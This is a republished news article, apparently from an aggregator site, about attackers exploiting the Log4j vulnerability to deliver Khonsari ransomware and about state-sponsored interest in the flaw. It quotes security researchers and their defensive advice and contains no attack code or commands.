Security researchers have found evidence that the group behind the Khonsari ransomware is exploiting the Log4j vulnerability to deliver it. Other state-sponsored groups are also looking into the vulnerability, according to researchers at CrowdStrike.
In a report on Monday, BitDefender’s Martin Zugec wrote that on Sunday, they saw attacks against systems running the Windows operating system attempting to deploy a ransomware family called Khonsari.
Zugec told ZDNet that Khonsari is relatively new ransomware and is considered basic compared to the level of sophistication that is seen from more professional ransomware-as-a-service groups.
“Most likely, it is a threat actor experimenting with this new attack vector. However, that doesn’t mean that more advanced actors are not looking at exploiting the Log4j vulnerability, they most assuredly are. Instead of looking for the most simple, shortest route to monetization, they will use this window of opportunity to gain access to the networks and start preparing for a full-scale larger attack,” Zugec explained.
“We are seeing deployments of backdoors and remote shell deployments already. If you haven’t patched already, you may already have uninvited, dormant guests in your network.”
Cado Security released its own report on the ransomware, noting that it “weighs in at only 12 KB and contains only the most basic functionality required to perform it’s ransomware objective.”
“It’s size and simplicity is also a strength however – at the time we ran the malware dynamically it wasn’t detected by the systems built in Antivirus,” Cado’s Matt Muir explained.
Ransomware expert Brett Callow called Khonsari “skid-level ransomware” but noted that it is safe to assume that some of the other actors attempting to exploit this vulnerability will be more advanced.
“Not all will be ransomware gangs. Threat actors of all stripes are attempting to find ways to use Log4j to their advantage,” Callow said.
McAfee Enterprise and FireEye Chief Scientist Raj Samani told ZDNet that most of the payloads attacking Log4j are predominantly a nuisance but the ease with which it can be deployed and the prevalence of vulnerable systems does mean payloads could well become more destructive.
“Given the ability to execute arbitrary code using Log4Shell, malware and more specifically ransomware, certainly seems like the next logical attack phase ripe for exploitation. We do expect unpatched systems to continue to be exploited with a high likelihood of ransomware as a malicious payload,” said McAfee Enterprise and FireEye head of advanced threat research Steve Povolny.
Web servers are the most common systems under attack right now because that’s they are easy to exploit and have a good return on investment, according to ESET’s Marc-Étienne Léveillé, who added that in the next few weeks, we’ll probably discover other software using Log4j that’s vulnerable.
“I expect malicious groups will start scanning for those too,” Léveillé said.
Zugec explained that most zero-day vulnerabilities are first attacked by opportunists trying to breach vulnerable systems as fast as possible, which is the stage IT teams are currently in with Log4j.
The second stage, he said, involves the vulnerability becoming a tool used for more targeted attacks down the road.
“It is inevitable ransomware operators will seek to establish a foothold now and then exploit this vulnerability at a later stage to cause maximum impact,” Zugec said.
Adam Meyers, SVP of intelligence at CrowdStrike, said his team has observed Iran-based state-sponsored actor NEMESIS KITTEN newly deploy into a server a class file that could be triggered by Log4J.
“The timing, intent and capability are consistent with what would be the adversary attempting to exploit Log4J. CrowdStrike has previously observed NEMESIS KITTEN attempt both disruptive and destructive attacks,” Meyers added.
Sophos senior threat researcher Sean Gallagher explained that so far, Log4Shell attackers have been focused on cryptomining but called it the “lull before the storm”
“We expect adversaries are likely grabbing as much access to whatever they can get right now with the view to monetize and/or capitalize on it later on. The most immediate priority for defenders is to reduce exposure by patching and mitigating all corners of their infrastructure and investigate exposed and potentially compromised systems. This vulnerability can be everywhere,” Gallagher said.
“Where systems have been identified as vulnerable, defenders should run an incident response process and monitor for signs of remote access trojans such as C2 call-backs. Secrets stored on exposed systems should also be rotated, particularly if they are exposed in environment variables. Lastly, consider critical third party vendors who may also be at risk.”
Stay connected with us on social media platform for instant update click here to join our Twitter, & Facebook
We are now on Telegram. Click here to join our channel (@TechiUpdate) and stay updated with the latest Technology headlines.
For all the latest Technology News Click Here
For the latest news and updates, follow us on Google News.
Denial of responsibility! NewsAzi is an automatic aggregator around the global media. All the content are available free on Internet. We have just arranged it in one platform for educational purpose only. In each content, the hyperlink to the primary source is specified. All trademarks belong to their rightful owners, all materials to their authors. If you are the owner of the content and do not want us to publish your materials on our website, please contact us by email – [email protected]. The content will be deleted within 24 hours.
